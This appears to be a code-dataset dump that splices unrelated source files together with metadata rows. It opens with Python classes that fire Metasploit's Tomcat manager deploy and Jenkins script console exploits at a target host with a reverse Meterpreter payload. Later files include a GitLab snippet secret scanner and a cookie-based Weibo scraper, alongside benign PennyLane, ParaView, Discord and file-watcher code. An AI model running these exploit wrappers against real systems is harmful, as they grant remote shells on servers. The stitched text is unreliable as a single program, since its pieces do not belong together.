    Wraps Metasploit's ``exploit/multi/http/tomcat_mgr_deploy``:
    https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/tomcat_mgr_deploy.rb
    """

    def __init__(self, target=(0, 0)):
        self.name = "Apache_Tomcat_Execution"
        self.target = target
        self.service = "http"
        self.req_access = None
        self.req_os = "multi"
        self.req_version = None
        # NOTE(review): super(Exploit, self) skips Exploit.__init__ and calls its
        # parent's __init__ instead; confirm this is intentional.
        super(Exploit, self).__init__(
            self.name, self.target, self.req_access, self.req_os, self.req_version
        )

    def execute(self, client, host, port=8080):
        """Fire the Tomcat manager deploy exploit at host:port and block until done.

        Fix: pymetasploit3's ``ExploitModule.execute`` selects the payload via
        the ``payload`` keyword; the previous ``cmd=`` keyword was ignored.

        :param client: connected metasploit RPC client
        :param host: string representing IP of the target
        :param port: Tomcat HTTP port, default 8080
        """
        exploit = client.modules.use("exploit", "multi/http/tomcat_mgr_deploy")
        exploit["RHOSTS"] = host
        exploit["RPORT"] = port
        job_info = exploit.execute(payload="java/meterpreter/reverse_https")
        wait_for_job_completion(job_info, client)
class Jenkins_CI_Script_Java_Execution(Exploit):
    """Jenkins-CI script-console Java execution.

    Wraps Metasploit's ``exploit/multi/http/jenkins_script_console``:
    https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/jenkins_script_console.rb
    """

    def __init__(self, target=(0, 0)):
        self.name = "Jenkins_CI_Script_Console_Java_Execution"
        self.service = "http"
        self.target = target
        self.req_access = None
        self.req_os = "multi"
        self.req_version = None
        # NOTE(review): super(Exploit, self) skips Exploit.__init__ and calls its
        # parent's __init__ instead; confirm this is intentional.
        super(Exploit, self).__init__(
            self.name, self.target, self.req_access, self.req_os, self.req_version
        )

    def execute(self, client, host, port=8080):
        """Fire the Jenkins script-console exploit at host:port and block until done.

        Fix: pymetasploit3's ``ExploitModule.execute`` selects the payload via
        the ``payload`` keyword; the previous ``cmd=`` keyword was ignored.

        :param client: connected metasploit RPC client
        :param host: string representing IP of the target
        :param port: Jenkins HTTP port, default 8080
        """
        exploit = client.modules.use("exploit", "multi/http/jenkins_script_console")
        exploit["RHOSTS"] = host
        exploit["RPORT"] = port
        job_info = exploit.execute(payload="java/meterpreter/reverse_https")
        wait_for_job_completion(job_info, client)
| 34.556604 | 143 | 0.628651 | 13,992 | 0.954955 | 0 | 0 | 0 | 0 | 0 | 0 | 6,705 | 0.457617 |
2cc7f3efda8117742ff48850a1183416a5ff0254 | 10,178 | py | Python | pennylane/templates/tensornetworks/mera.py | therooler/pennylane | 88a8a5960a2ffd218a12f85ace632021eef2abf5 | [
"Apache-2.0"
] | null | null | null | pennylane/templates/tensornetworks/mera.py | therooler/pennylane | 88a8a5960a2ffd218a12f85ace632021eef2abf5 | [
"Apache-2.0"
] | null | null | null | pennylane/templates/tensornetworks/mera.py | therooler/pennylane | 88a8a5960a2ffd218a12f85ace632021eef2abf5 | [
"Apache-2.0"
] | null | null | null | # Copyright 2018-2021 Xanadu Quantum Technologies Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Contains the MERA template.
"""
# pylint: disable-msg=too-many-branches,too-many-arguments,protected-access
import warnings
import pennylane as qml
import pennylane.numpy as np
from pennylane.operation import Operation, AnyWires
def compute_indices(wires, n_block_wires):
    """Generate a list containing the wires for each block.

    Blocks are built layer by layer from the coarsest layer outward; the list
    is reversed at the end so execution order runs from the first (finest)
    layer to the last.

    Args:
        wires (Iterable): wires that the template acts on
        n_block_wires (int): number of wires per block

    Returns:
        layers (array): array of wire labels for each block
    """
    n_wires = len(wires)
    if n_block_wires % 2 != 0:
        raise ValueError(f"n_block_wires must be an even integer; got {n_block_wires}")

    if n_block_wires < 2:
        raise ValueError(
            f"number of wires in each block must be larger than or equal to 2; got n_block_wires = {n_block_wires}"
        )

    if n_block_wires > n_wires:
        raise ValueError(
            f"n_block_wires must be smaller than or equal to the number of wires; "
            f"got n_block_wires = {n_block_wires} and number of wires = {n_wires}"
        )

    if not np.log2(n_wires / n_block_wires).is_integer():
        warnings.warn(
            f"The number of wires should be n_block_wires times 2^n; got n_wires/n_block_wires = {n_wires/n_block_wires}"
        )

    # number of layers in MERA
    n_layers = np.floor(np.log2(n_wires / n_block_wires)).astype(int) * 2 + 1

    wires_list = []
    wires_list.append(list(wires[0:n_block_wires]))
    # next unused wire label index
    highest_index = n_block_wires

    # compute block indices for all layers
    for i in range(n_layers - 1):
        # number of blocks in previous layer
        n_elements_pre = 2 ** ((i + 1) // 2)
        if i % 2 == 0:
            # layer with new wires: each previous block spawns two blocks, each
            # pairing half of the previous block's wires with fresh wires
            new_list = []
            list_len = len(wires_list)
            for j in range(list_len - n_elements_pre, list_len):
                new_wires = [
                    wires[k] for k in range(highest_index, highest_index + n_block_wires // 2)
                ]
                highest_index += n_block_wires // 2
                new_list.append(wires_list[j][0 : n_block_wires // 2] + new_wires)
                new_wires = [
                    wires[k] for k in range(highest_index, highest_index + n_block_wires // 2)
                ]
                highest_index += n_block_wires // 2
                new_list.append(new_wires + wires_list[j][n_block_wires // 2 : :])
            wires_list = wires_list + new_list
        else:
            # layer only using previous wires: blocks bridge adjacent blocks of
            # the previous layer, wrapping around at the end
            list_len = len(wires_list)
            new_list = []
            for j in range(list_len - n_elements_pre, list_len - 1):
                new_list.append(
                    wires_list[j][n_block_wires // 2 : :]
                    + wires_list[j + 1][0 : n_block_wires // 2]
                )
            # wrap-around block: last block of the previous layer joined with the first
            new_list.append(
                wires_list[j + 1][n_block_wires // 2 : :]
                + wires_list[list_len - n_elements_pre][0 : n_block_wires // 2]
            )
            wires_list = wires_list + new_list

    return wires_list[::-1]
class MERA(Operation):
    """The MERA template broadcasts an input circuit across many wires following the
    architecture of a multi-scale entanglement renormalization ansatz tensor network.

    This architecture can be found in `arXiv:quant-ph/0610099 <https://arxiv.org/abs/quant-ph/0610099>`_
    and closely resembles `quantum convolutional neural networks <https://arxiv.org/abs/1810.03787>`_.

    The argument ``block`` is a user-defined quantum circuit. Each ``block`` may depend on a different set of parameters.
    These are passed as a list by the ``template_weights`` argument.

    For more details, see *Usage Details* below.

    Args:
        wires (Iterable): wires that the template acts on
        n_block_wires (int): number of wires per block
        block (Callable): quantum circuit that defines a block
        n_params_block (int): the number of parameters in a block
        template_weights (Sequence): list containing the weights for all blocks

    .. UsageDetails::

        In general, the block takes D parameters and **must** have the following signature:

        .. code-block:: python

            unitary(parameter1, parameter2, ... parameterD, wires)

        For a block with multiple parameters, ``n_params_block`` is equal to the number of parameters in ``block``.
        For a block with a single parameter, ``n_params_block`` is equal to the length of the parameter array.
        To avoid using ragged arrays, all block parameters should have the same dimension.

        The length of the ``template_weights`` argument should match the number of blocks.
        The expected number of blocks can be obtained from ``qml.MERA.get_n_blocks(wires, n_block_wires)``.

        This example demonstrates the use of ``MERA`` for a simple block.

        .. code-block:: python

            import pennylane as qml
            import numpy as np

            def block(weights, wires):
                qml.CNOT(wires=[wires[0],wires[1]])
                qml.RY(weights[0], wires=wires[0])
                qml.RY(weights[1], wires=wires[1])

            n_wires = 4
            n_block_wires = 2
            n_params_block = 2
            n_blocks = qml.MERA.get_n_blocks(range(n_wires),n_block_wires)
            template_weights = [[0.1,-0.3]]*n_blocks

            dev= qml.device('default.qubit',wires=range(n_wires))
            @qml.qnode(dev)
            def circuit(template_weights):
                qml.MERA(range(n_wires),n_block_wires,block, n_params_block, template_weights)
                return qml.expval(qml.PauliZ(wires=1))

        It may be necessary to reorder the wires to see the MERA architecture clearly:

        >>> print(qml.draw(circuit,expansion_strategy='device',wire_order=[2,0,1,3])(template_weights))
        2: ───────────────╭C──RY(0.10)──╭X──RY(-0.30)───────────────┤
        0: ─╭X──RY(-0.30)─│─────────────╰C──RY(0.10)──╭C──RY(0.10)──┤
        1: ─╰C──RY(0.10)──│─────────────╭X──RY(-0.30)─╰X──RY(-0.30)─┤ <Z>
        3: ───────────────╰X──RY(-0.30)─╰C──RY(0.10)────────────────┤
    """

    num_wires = AnyWires
    grad_method = None

    @property
    def num_params(self):
        # Single trainable argument: the full template_weights tensor.
        return 1

    def __init__(
        self,
        wires,
        n_block_wires,
        block,
        n_params_block,
        template_weights=None,
        do_queue=True,
        id=None,
    ):
        # Pre-compute the wire labels used by each block (validates the inputs).
        ind_gates = compute_indices(wires, n_block_wires)
        n_wires = len(wires)

        shape = qml.math.shape(template_weights)  # (n_params_block, n_blocks)
        n_blocks = int(2 ** (np.floor(np.log2(n_wires / n_block_wires)) + 2) - 3)
        if shape == ():
            # No weights supplied: initialize randomly with the expected shape.
            template_weights = np.random.rand(n_params_block, int(n_blocks))
        else:
            if shape[0] != n_blocks:
                raise ValueError(
                    f"Weights tensor must have first dimension of length {n_blocks}; got {shape[0]}"
                )
            if shape[-1] != n_params_block:
                raise ValueError(
                    f"Weights tensor must have last dimension of length {n_params_block}; got {shape[-1]}"
                )

        self._hyperparameters = {"ind_gates": ind_gates, "block": block}
        super().__init__(template_weights, wires=wires, do_queue=do_queue, id=id)

    @staticmethod
    def compute_decomposition(
        weights, wires, block, ind_gates
    ):  # pylint: disable=arguments-differ,unused-argument
        r"""Representation of the operator as a product of other operators.

        .. math:: O = O_1 O_2 \dots O_n.

        .. seealso:: :meth:`~.MERA.decomposition`.

        Args:
            weights (list[tensor_like]): list containing the weights for all blocks
            wires (Iterable): wires that the template acts on
            block (Callable): quantum circuit that defines a block
            ind_gates (array): array of wire indices

        Returns:
            list[.Operator]: decomposition of the operator
        """
        op_list = []
        # Dispatch on the block's arity: multiple scalar params, a single
        # parameter array, or no parameters besides ``wires``.
        if block.__code__.co_argcount > 2:
            for idx, w in enumerate(ind_gates):
                op_list.append(block(*weights[idx], wires=w))
        elif block.__code__.co_argcount == 2:
            for idx, w in enumerate(ind_gates):
                op_list.append(block(weights[idx], wires=w))
        else:
            for idx, w in enumerate(ind_gates):
                op_list.append(block(wires=w))
        return op_list

    @staticmethod
    def get_n_blocks(wires, n_block_wires):
        """Returns the expected number of blocks for a set of wires and number of wires per block.

        Args:
            wires (Sequence): number of wires the template acts on
            n_block_wires (int): number of wires per block

        Returns:
            n_blocks (int): number of blocks; expected length of the template_weights argument
        """
        n_wires = len(wires)
        if not np.log2(n_wires / n_block_wires).is_integer():
            warnings.warn(
                f"The number of wires should be n_block_wires times 2^n; got n_wires/n_block_wires = {n_wires/n_block_wires}"
            )

        if n_block_wires > n_wires:
            raise ValueError(
                f"n_block_wires must be smaller than or equal to the number of wires; got n_block_wires = {n_block_wires} and number of wires = {n_wires}"
            )

        n_blocks = 2 ** (np.floor(np.log2(n_wires / n_block_wires)) + 2) - 3
        return int(n_blocks)
| 38.996169 | 154 | 0.609255 | 6,734 | 0.644279 | 0 | 0 | 2,220 | 0.2124 | 0 | 0 | 6,235 | 0.596537 |
2ccaa53b5e3038c5d05c44b30a9de09a9e84933a | 3,106 | py | Python | paraview/addLinePlotHopefully.py | lindsayad/python | 4b63a8b02de6a7c0caa7bb770f3f22366e066a7f | [
"MIT"
] | null | null | null | paraview/addLinePlotHopefully.py | lindsayad/python | 4b63a8b02de6a7c0caa7bb770f3f22366e066a7f | [
"MIT"
] | null | null | null | paraview/addLinePlotHopefully.py | lindsayad/python | 4b63a8b02de6a7c0caa7bb770f3f22366e066a7f | [
"MIT"
] | null | null | null | try: paraview.simple
except: from paraview.simple import *
paraview.simple._DisableFirstRenderCameraReset()
# Remove the currently active plot-over-line filter before rebuilding it.
PlotOverLine6 = GetActiveSource()
PlotOverLine6.Input = []
PlotOverLine6.Source = []
XYChartView1 = GetRenderView()
Delete(PlotOverLine6)
# Load the Exodus results file and restrict the animation to its time steps.
AnimationScene1 = GetAnimationScene()
AnimationScene1.EndTime = 1.0
AnimationScene1.PlayMode = 'Sequence'
lots_of_variables_out_e = ExodusIIReader( FileName=['/home/alexlindsay/zapdos/problems/lots_of_variables_out.e'] )
AnimationScene1.EndTime = 0.0094
AnimationScene1.PlayMode = 'Snap To TimeSteps'
lots_of_variables_out_e.FileRange = [0, 0]
lots_of_variables_out_e.XMLFileName = 'Invalid result'
lots_of_variables_out_e.FilePrefix = '/home/alexlindsay/zapdos/problems/lots_of_variables_out.e'
lots_of_variables_out_e.ModeShape = 5
lots_of_variables_out_e.FilePattern = '%s'
# Only the 1-D element block and the 'em' point variable are read.
lots_of_variables_out_e.ElementBlocks = ['Unnamed block ID: 0 Type: EDGE2']
lots_of_variables_out_e.NodeSetArrayStatus = []
lots_of_variables_out_e.SideSetArrayStatus = []
lots_of_variables_out_e.PointVariables = ['em']
# Temporary 2D render view used while the data representation is configured.
RenderView7 = CreateRenderView()
RenderView7.CompressorConfig = 'vtkSquirtCompressor 0 3'
RenderView7.InteractionMode = '2D'
RenderView7.UseLight = 1
RenderView7.CameraPosition = [1.0300000212737359e-05, 10000.0, 10000.0]
RenderView7.LightSwitch = 0
RenderView7.Background = [0.31999694819562063, 0.3400015259021897, 0.4299992370489052]
RenderView7.CameraFocalPoint = [1.0300000212737359e-05, 0.0, 0.0]
RenderView7.CameraViewUp = [1.0, 1.0, 0.0]
RenderView7.CenterOfRotation = [1.0300000212737359e-05, 0.0, 0.0]
RenderView7.CameraParallelProjection = 1
AnimationScene1.ViewModules = [ XYChartView1, RenderView7 ]
DataRepresentation13 = Show()
DataRepresentation13.EdgeColor = [0.0, 0.0, 0.5000076295109483]
DataRepresentation13.SelectionPointFieldDataArrayName = 'em'
DataRepresentation13.SelectionCellFieldDataArrayName = 'GlobalElementId'
DataRepresentation13.ScalarOpacityUnitDistance = 9.561673194730194e-06
DataRepresentation13.ExtractedBlockIndex = 2
DataRepresentation13.ScaleFactor = 2.060000042547472e-06
RenderView7.CameraViewUp = [0.7071067811865476, 0.7071067811865476, 0.0]
RenderView7.CameraPosition = [1.0300000212737359e-05, 3.102185033432059e-05, 3.102185033432059e-05]
RenderView7.CameraClippingRange = [4.343280625797747e-05, 4.452959429479509e-05]
RenderView7.CameraParallelScale = 1.1426769862779412e-05
# Drop the temporary render view; only the XY chart view is kept.
AnimationScene1.ViewModules = XYChartView1
Delete(RenderView7)
Delete(DataRepresentation13)
# Sample the solution along a line through the 1-D domain and plot
# 'em' versus arc length in the chart view at t = 0.0094.
PlotOverLine7 = PlotOverLine( Source="High Resolution Line Source" )
PlotOverLine7.Source.Point2 = [2.0600000425474718e-05, 0.0, 0.0]
PlotOverLine7.Source.Resolution = 10
SetActiveView(XYChartView1)
DataRepresentation14 = Show()
DataRepresentation14.XArrayName = 'arc_length'
DataRepresentation14.SeriesVisibility = ['ObjectId', '0', 'Points (0)', '0', 'Points (1)', '0', 'Points (2)', '0', 'Points (Magnitude)', '0', 'arc_length', '0', 'vtkOriginalIndices', '0', 'vtkValidPointMask', '0']
DataRepresentation14.UseIndexForXAxis = 0
XYChartView1.BottomAxisRange = [0.0, 2.1e-05]
AnimationScene1.AnimationTime = 0.0094
Render()
| 38.345679 | 213 | 0.808113 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 436 | 0.140373 |
2ccae3f2f4d0694e8447d48bb97cc62a0e4c0a05 | 1,420 | py | Python | Sprint-Challenge/acme_test.py | martinclehman/DS-Unit-3-Sprint-1-Software-Engineering | 7bca22a2b398ee57021bbe7efd66e3d6cd55f527 | [
"MIT"
] | null | null | null | Sprint-Challenge/acme_test.py | martinclehman/DS-Unit-3-Sprint-1-Software-Engineering | 7bca22a2b398ee57021bbe7efd66e3d6cd55f527 | [
"MIT"
] | null | null | null | Sprint-Challenge/acme_test.py | martinclehman/DS-Unit-3-Sprint-1-Software-Engineering | 7bca22a2b398ee57021bbe7efd66e3d6cd55f527 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import unittest
from acme import Product
from acme_report import generate_products, ADJECTIVES, NOUNS
class AcmeProductTests(unittest.TestCase):
    """Making sure Acme products are the tops!"""

    def test_default_product_price(self):
        """A product created with only a name costs 10."""
        product = Product('Test Product')
        self.assertEqual(product.price, 10)

    def test_default_product_weight(self):
        """A product created with only a name weighs 20."""
        product = Product('Test Product')
        self.assertEqual(product.weight, 20)

    def test_stealability_and_explosiveness(self):
        """A heavy, cheap, extremely flammable product is unstealable and explodes."""
        product = Product('Nuclear Weapon', price=1,
                          weight=1000, flammability=1000000)
        self.assertEqual(product.stealability(), 'Not so stealable...')
        self.assertEqual(product.explode(), '...BABOOM!!')
class AcmeReportTests(unittest.TestCase):
    """Making sure Acme reports are accurate."""

    def test_default_num_products(self):
        """generate_products() yields 30 products by default."""
        self.assertEqual(len(generate_products()), 30)

    def test_legal_names(self):
        """Every generated name is '<ADJECTIVE> <NOUN>' drawn from the word lists."""
        for product in generate_products():
            tokens = product.name.split(' ')
            self.assertIn(tokens[0], ADJECTIVES)
            self.assertIn(tokens[1], NOUNS)
if __name__ == '__main__':
    # Run the suite when executed directly (python acme_test.py).
    unittest.main()
| 30.869565 | 68 | 0.650704 | 1,240 | 0.873239 | 0 | 0 | 0 | 0 | 0 | 0 | 286 | 0.201408 |
2ccc30297fe2bc48b79aa3af93e00e68981d2c5f | 909 | py | Python | cogs/meta.py | popop098/Teasia-Bot.py | 764c3b1cab8e07a9e98690263ad94011ee26ab72 | [
"MIT"
] | 1 | 2020-12-21T12:05:25.000Z | 2020-12-21T12:05:25.000Z | cogs/meta.py | popop098/Taesia-Bot.py | 764c3b1cab8e07a9e98690263ad94011ee26ab72 | [
"MIT"
] | null | null | null | cogs/meta.py | popop098/Taesia-Bot.py | 764c3b1cab8e07a9e98690263ad94011ee26ab72 | [
"MIT"
] | 1 | 2021-10-30T03:45:42.000Z | 2021-10-30T03:45:42.000Z | from discord.ext import commands
import discord
from datetime import datetime
from src import util
from tools.checker import Checker,Embed
class Meta(commands.Cog):
    """Commands relating to the bot itself."""

    def __init__(self, bot):
        self.bot = bot
        # Remember startup time so the uptime command can report elapsed time.
        self.start_time = datetime.now()
        # Drop discord.py's default help command; the bot provides its own UX.
        bot.remove_command("help")

    @commands.command(name="업타임")
    async def uptime(self, ctx):
        ch = Checker(ctx=ctx)
        em = Embed(ctx=ctx)
        # Licence gate: 400 -> refuse with an embed, 200 -> proceed.
        if await ch.licence() == 400:
            return await ctx.send(embed=em.no_())
        elif await ch.licence() == 200:
            pass
        # NOTE(review): the bare string below looks like a misplaced
        # docstring; it has no runtime effect.
        """Tells how long the bot has been running."""
        uptime_seconds = round(
            (datetime.now() - self.start_time).total_seconds())
        # Message text means "time the bot has been running".
        await ctx.send(f"> 봇이 작동한시간: {util.format_seconds(uptime_seconds)}"
                       )
def setup(bot):
    # Entry point used by discord.py's extension loader (bot.load_extension).
    bot.add_cog(Meta(bot))
2ccc32a9d54e1ab42568aa7d3865a9dbd5b08751 | 2,399 | py | Python | sciencebeam_trainer_delft/utils/cloud_support.py | elifesciences/sciencebeam-trainer-delft | 0f7da96cdf32acf1538a5fded192255158883ba0 | [
"MIT"
] | 5 | 2019-10-19T13:00:34.000Z | 2022-01-16T17:31:42.000Z | sciencebeam_trainer_delft/utils/cloud_support.py | elifesciences/sciencebeam-trainer-delft | 0f7da96cdf32acf1538a5fded192255158883ba0 | [
"MIT"
] | 162 | 2019-08-22T10:28:46.000Z | 2022-03-28T17:33:16.000Z | sciencebeam_trainer_delft/utils/cloud_support.py | elifesciences/sciencebeam-trainer-delft | 0f7da96cdf32acf1538a5fded192255158883ba0 | [
"MIT"
] | null | null | null | import os
import logging
from contextlib import contextmanager
from tempfile import TemporaryDirectory, mkdtemp
from pathlib import Path
from six import string_types
from sciencebeam_trainer_delft.utils.io import copy_file, path_join
LOGGER = logging.getLogger(__name__)
def _is_cloud_location(filepath):
    """Return True when *filepath* is a string pointing at Google Cloud Storage.

    Non-string values (e.g. None or Path objects) are reported as local.
    """
    # six.string_types is just (str,) on Python 3, which this module already
    # requires (it uses function annotations); test against str directly.
    return isinstance(filepath, str) and filepath.startswith('gs://')
def _copy_file_to_cloud(source_filepath, target_filepath, overwrite=True):
    # Thin wrapper around the project's copy_file for a single file upload.
    copy_file(source_filepath, target_filepath, overwrite=overwrite)
def _copy_directory_to_cloud(source_filepath, target_filepath, overwrite=True):
    """Recursively upload every file below *source_filepath*.

    Directory entries are skipped; the relative layout is preserved under
    *target_filepath*.
    """
    source_root = Path(source_filepath)
    local_files = (entry for entry in source_root.glob('**/*') if entry.is_file())
    for local_file in local_files:
        remote_path = path_join(
            target_filepath, local_file.relative_to(source_filepath)
        )
        LOGGER.info('copying %s to %s', local_file, remote_path)
        _copy_file_to_cloud(local_file, remote_path, overwrite=overwrite)
def _copy_to_cloud(source_filepath, target_filepath, overwrite=True):
    """Upload *source_filepath* (file or directory) to *target_filepath*.

    Anything that is neither a regular file nor a directory is silently
    ignored (best-effort behaviour).
    """
    source = Path(source_filepath)
    if source.is_file():
        _copy_file_to_cloud(source_filepath, target_filepath, overwrite=overwrite)
    elif source.is_dir():
        _copy_directory_to_cloud(source_filepath, target_filepath, overwrite=overwrite)
def _get_temp_path(filepath):
    # Create (and return) a fresh temp directory whose name ends with the
    # basename of *filepath*, making stray directories easy to attribute.
    return mkdtemp(suffix=os.path.basename(filepath))
@contextmanager
def _cloud_location_as_temp_context(filepath):
    """Yield a local temp path that is uploaded to *filepath* on success.

    The upload only runs when the ``with`` body exits without raising
    (the exception is thrown into the generator at the yield); the
    temporary directory is always removed afterwards.
    """
    with TemporaryDirectory(suffix=os.path.basename(filepath)) as temp_dir:
        temp_path = os.path.join(temp_dir, os.path.basename(filepath))
        LOGGER.info('temp_path: %s', temp_dir)
        yield temp_path
        _copy_to_cloud(temp_path, filepath)
@contextmanager
def auto_upload_from_local_path(filepath: str):
    """Yield a usable local directory path for *filepath*.

    Local paths are created if necessary and yielded directly; cloud
    (gs://) paths yield a temporary directory that is uploaded once the
    ``with`` body completes successfully.
    """
    if not filepath or not _is_cloud_location(filepath):
        if filepath:
            # Only create a directory for a real local path;
            # os.makedirs(None) / os.makedirs('') would raise.
            os.makedirs(filepath, exist_ok=True)
        yield filepath
    else:
        with _cloud_location_as_temp_context(filepath) as temp_path:
            yield temp_path
@contextmanager
def auto_upload_from_local_file(filepath: str):
    """Yield a usable local file path for *filepath*.

    Cloud (gs://) paths yield a temporary local path that is uploaded when
    the ``with`` body completes successfully; everything else is yielded
    unchanged.
    """
    if filepath and _is_cloud_location(filepath):
        with _cloud_location_as_temp_context(filepath) as local_path:
            yield local_path
    else:
        yield filepath
def patch_cloud_support():
    # Deprecated no-op kept so existing callers do not break; cloud support
    # no longer needs patching.
    pass
| 31.155844 | 87 | 0.754481 | 0 | 0 | 823 | 0.34306 | 871 | 0.363068 | 0 | 0 | 58 | 0.024177 |
2ccccaa55f701008cb48549110c575227e96696f | 1,048 | py | Python | gitlab/snippets.py | codeEmitter/token-hunter | 46809c64074b68bb819ea50911bc65f246425106 | [
"BSD-3-Clause"
] | 35 | 2021-01-06T08:26:38.000Z | 2022-01-18T21:18:46.000Z | gitlab/snippets.py | codeEmitter/token-hunter | 46809c64074b68bb819ea50911bc65f246425106 | [
"BSD-3-Clause"
] | null | null | null | gitlab/snippets.py | codeEmitter/token-hunter | 46809c64074b68bb819ea50911bc65f246425106 | [
"BSD-3-Clause"
] | 13 | 2020-11-04T05:37:43.000Z | 2022-01-12T10:22:59.000Z | from logging import warning
from api import gitlab
from utilities import validate, types
# Module-level GitLab API client built from the CLI-supplied URL.
# NOTE(review): this rebinding shadows the imported `gitlab` module name.
gitlab = gitlab.GitLab(types.Arguments().url)
def get_all(projects):
    """Collect snippet id -> web URL for every project in *projects*.

    Each element of *projects* is a mapping of project id -> project name.
    """
    snippets = {}
    for project in projects:
        for project_id, project_name in project.items():
            details = gitlab.get_project_snippets(project_id)
            if not validate.api_result(details):
                continue
            warning("[*] Found %s snippets for project %s", len(details),
                    project_name)
            for item in details:
                snippets[item['id']] = item['web_url']
    return snippets
def sniff_secrets(snippets):
    """Fetch each snippet's raw content and scan it for secrets.

    Args:
        snippets: mapping of snippet id -> snippet web URL.

    Returns:
        list: secrets found across all snippets (empty when none).
    """
    if not snippets:
        return []
    raw_data = {
        snippet_url: gitlab.get_snippet_raw(snippet_id)
        for snippet_id, snippet_url in snippets.items()
    }
    if not raw_data:
        return []
    monitor = types.SecretsMonitor()
    return list(monitor.sniff_secrets(raw_data))
| 29.942857 | 84 | 0.634542 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 51 | 0.048664 |
2cccf7b04a13dc0853d0b836ac33f0e371b7ca36 | 670 | py | Python | login/weibo_with_known_cookie.py | bobjiangps/python-spider-example | 7021dc3052fe1a667b79b810403e8ae3f03253b3 | [
"MIT"
] | null | null | null | login/weibo_with_known_cookie.py | bobjiangps/python-spider-example | 7021dc3052fe1a667b79b810403e8ae3f03253b3 | [
"MIT"
] | 3 | 2021-03-31T19:20:41.000Z | 2022-03-12T01:03:06.000Z | login/weibo_with_known_cookie.py | bobjiangps/python-spider-example | 7021dc3052fe1a667b79b810403e8ae3f03253b3 | [
"MIT"
] | null | null | null | import requests
if __name__ == "__main__":
    # Browser-like request headers; the cookie must be copied from an
    # already-authenticated browser session (cookie-based Weibo login).
    headers = {
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
        'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0',
        'Connection': 'keep-alive',
        'cookie': 'replace your cookie here'  # update text
    }
    session = requests.Session()
    # Fetch the fans page of a fixed Weibo account using the session cookie.
    response = session.get('https://weibo.com/2671109275/fans?rightmod=1&wvr=6', headers=headers)
    print(response.text)
print(response.status_code) | 41.875 | 145 | 0.652239 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 417 | 0.622388 |
2ccd33542df9831359cfe4fc038aded21af9057a | 6,708 | py | Python | wcpan/watchdog/watcher.py | legnaleurc/wcpan.watchdog | a4f5b560327f207a344aae18091ecf6bbeba8189 | [
"MIT"
] | null | null | null | wcpan/watchdog/watcher.py | legnaleurc/wcpan.watchdog | a4f5b560327f207a344aae18091ecf6bbeba8189 | [
"MIT"
] | null | null | null | wcpan/watchdog/watcher.py | legnaleurc/wcpan.watchdog | a4f5b560327f207a344aae18091ecf6bbeba8189 | [
"MIT"
] | null | null | null | from __future__ import annotations
__all__ = ('WatcherContext', 'Watcher')
import asyncio
import os
import time
from concurrent.futures import Executor, ThreadPoolExecutor
from contextlib import AsyncExitStack
from functools import partial
from typing import Awaitable, Callable, Optional, Protocol, Set, TypeVar, Union
from .walker import ChangeEntry, Walker
from .filters import Filter, create_default_filter
T = TypeVar('T')
class Runner(Protocol):
    """Awaitable callable that executes *cb* with the given arguments
    (typically in an executor) and returns its result."""

    async def __call__(self, cb: Callable[..., T], *args, **kwargs) -> T:
        pass
class WatcherContext(object):
    """Context manager of watchers.

    This class maintains the context needed by watchers, especially executor.
    Parameters will be used as default values for each watchers.

    stop_event is an asyncio.Event object which gives the watcher a hint about
    when to stop the watching loop. If stop_event is None, the loop will NEVER
    stop.

    filter_ is a Filter object, to filter out files and directories being
    watching. If omitted, create_default_filter() will be used.

    sleep_sec is the time in second to wait for new changes coming.

    min_sleep_sec is the minimum time in second to wait for new changes coming.

    debounce_sec is the maximum time to collect changes.

    executor is an Executor object, used to walk through the file system. If
    omitted, a ThreadPoolExecutor will be used. If you supplied an Executor,
    then it is caller's responsibility to stop the Executor.
    """

    def __init__(self,
        *,
        stop_event: Optional[asyncio.Event] = None,
        filter_: Optional[Filter] = None,
        sleep_sec: float = 0.4,
        min_sleep_sec: float = 0.05,
        debounce_sec: float = 1.6,
        executor: Optional[Executor] = None,
    ):
        # Stored as private attributes; Watcher reads them as fallbacks.
        self._stop_event = stop_event
        self._filter = filter_
        self._sleep_sec = sleep_sec
        self._min_sleep_sec = min_sleep_sec
        self._debounce_sec = debounce_sec
        self._executor = executor

    async def __aenter__(self) -> Watcher:
        # Own a ThreadPoolExecutor only when the caller did not supply one;
        # pop_all() transfers cleanup responsibility to __aexit__.
        async with AsyncExitStack() as stack:
            if self._executor is None:
                self._executor = stack.enter_context(ThreadPoolExecutor())
            self._raii = stack.pop_all()
        return Watcher(self)

    async def __aexit__(self, type_, exc, tb):
        # Release whatever __aenter__ acquired (the owned executor, if any).
        await self._raii.aclose()

    async def _run(self, cb: Callable[..., T], *args, **kwargs):
        # Run the blocking callable in the executor without blocking the loop.
        fn = partial(cb, *args, **kwargs)
        loop = asyncio.get_running_loop()
        return await loop.run_in_executor(self._executor, fn)

    async def _sleep(self, sec: float):
        # Indirection point so tests/iterators can share one sleep strategy.
        await asyncio.sleep(sec)
class Watcher(object):
    """Factory bound to a WatcherContext; calling it yields an async
    iterator of file-system change sets for a given path."""

    def __init__(self, context: WatcherContext) -> None:
        self._context = context

    def __call__(self,
        path: Union[os.PathLike, str],
        *,
        stop_event: Optional[asyncio.Event] = None,
        filter_: Optional[Filter] = None,
        sleep_sec: Optional[float] = None,
        min_sleep_sec: Optional[float] = None,
        debounce_sec: Optional[float] = None,
    ) -> ChangeIterator:
        """Create a ChangeIterator for *path*; omitted keyword arguments
        fall back to values stored on the context."""
        if not isinstance(path, str):
            path = str(path)
        if stop_event is None:
            stop_event = self._context._stop_event
        if filter_ is None:
            # NOTE(review): falls back to create_default_filter() instead of
